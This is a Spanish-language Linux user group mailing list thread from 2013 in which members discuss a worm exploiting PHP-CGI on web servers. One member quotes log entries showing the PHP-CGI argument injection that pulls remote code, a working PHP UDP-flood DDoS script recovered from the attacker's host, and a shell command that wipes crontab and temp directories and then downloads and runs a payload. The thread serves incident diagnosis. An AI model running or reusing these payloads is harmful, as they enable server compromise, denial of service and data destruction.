[Lugro-principiantes] Nuevo gusano que afecta GNU/Linux

Mie Dic 4 11:04:53 ART 2013

El 4 de diciembre de 2013 10:36, Sacanti
Ernesto<sacanti.ernesto en gmail.com>escribió:

> El 03/12/13 23:50, Martín Carr escribió:
>
>  2013/12/3, E S<micta2003 en yahoo.com>:
>>
>>> Estimados
>>>
>>> No me queda claro como me puede afectar este gusano. Tengo LinuxMint 15 y
>>> soy un usuario comun. Esas recomendaciones son para redes?
>>>
>>
>> Salvo que uses tu computadora como un servidor web (para alojar
>> páginas dinámicas que usan el lenguaje PHP) y no la hayas actualizado,
>> no tenés que preocuparte.
>>
>> Saludos!
>>
>>  No se si sera esto, pero encontre en mi servidor este log:
> /usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d
> suhosin.simulation=on -d disable_functions=\"\" -d open_basedir=none -d
> auto_prepend_file=http://82.221.102.181/robots.txt -d
> cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
>
>
Si tenes tu equipo infectado, pero por lo que leo sobre el virus para poder
acceder tienen que haber coseguido usuario y clave:

Una vez ejecutado, el gusano genera aleatoriamente direcciones IP,
accesando una ruta específica en la máquina con una ID y contraseña
conocida y envía solicitudes HTTP POST, que explotan la vulnerabilidad. Si
en el objetivo no ha sido corregida la vulnerabilidad, se descarga el
gusano desde un server malicioso y comienza a buscar un nuevo objetivo

> Como que esta intentando descargar un archivo robots.txt desde un
> servidor... al mirar este archivo encontre este codigo:
>
<?php
>
> function ddos($host, $exec_time){
>     $packets = 0;
>     ignore_user_abort(TRUE);
>     set_time_limit(0);
>     $out = '';
>     $time = time();
>     echo "Started: ".time('d-m-y h:i:s')."<br>";
>     $max_time = $time+$exec_time;
>
>     for($i=0;$i<65000;$i++){
>             $out .= 'h';
>     }
>     while(1){
>     $packets++;
>             if(time() > $max_time){
>                     break;
>             }
>             $rand = rand(1,65000);
>             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
>             if($fp){
>                     @fwrite($fp, $out); // $out is the bullshit we're
> sending, conn refused errors still send the data
>                     fclose($fp);
>             }
>     }
> }
> ddos("199.107.6.164","60");
>
> No se quien sera el pobre 199.107.6.164 pero me parece que se la tienen
> jurada....
>

Ellos tampoco, es una dirección al azar.

En un copypaste encontré esto:

www-data 16746     1  0 17344  6716   3 11:00 ?        S      0:00
/usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d suhosin.
simulation=on -d disable_functions=\"\" -d open_basedir=none -d
auto_prepend_file=php://input -d cgi.force_redirect=0 -d
cgi.redirect_status_env=0 -n
www-data 16748 16746  0   989   628   3 11:00 ?        S      0:00 sh -c
crontab -r ; killall -9 perl ; cd /tmp/ ; rm -rf * ; rm -rf .* ; cd
/var/tmp/ ; rm -rf .* ; rm -rf * ; wget http://88.191.144.153/sshd.tar ;
tar xvf sshd.tar ; tar zxvf sshd.tar ; cd .ssh_auth/.d ; chmod +x * ;
./dns-pool
www-data 16762 16748  0  4407  1592   2 11:00 ?        S      0:02
/bin/bash ./dns-pool

Por lo que se vé está corriendo con el usuario www-data, es decir el
usuario de apache.
Quizás tenga que ver con el código del gusano.

Omar

 Saludos
> Ernesto
>
> _______________________________________________
> Lugro-principiantes mailing list
> Lugro-principiantes en lugro.org.ar
> http://lugro.org.ar/mailman/listinfo/lugro-principiantes
>
------------ próxima parte ------------
Se ha borrado un adjunto en formato HTML...
URL: <http://lugro.org.ar/pipermail/lugro-principiantes/attachments/20131204/75417c0d/attachment-0001.htm>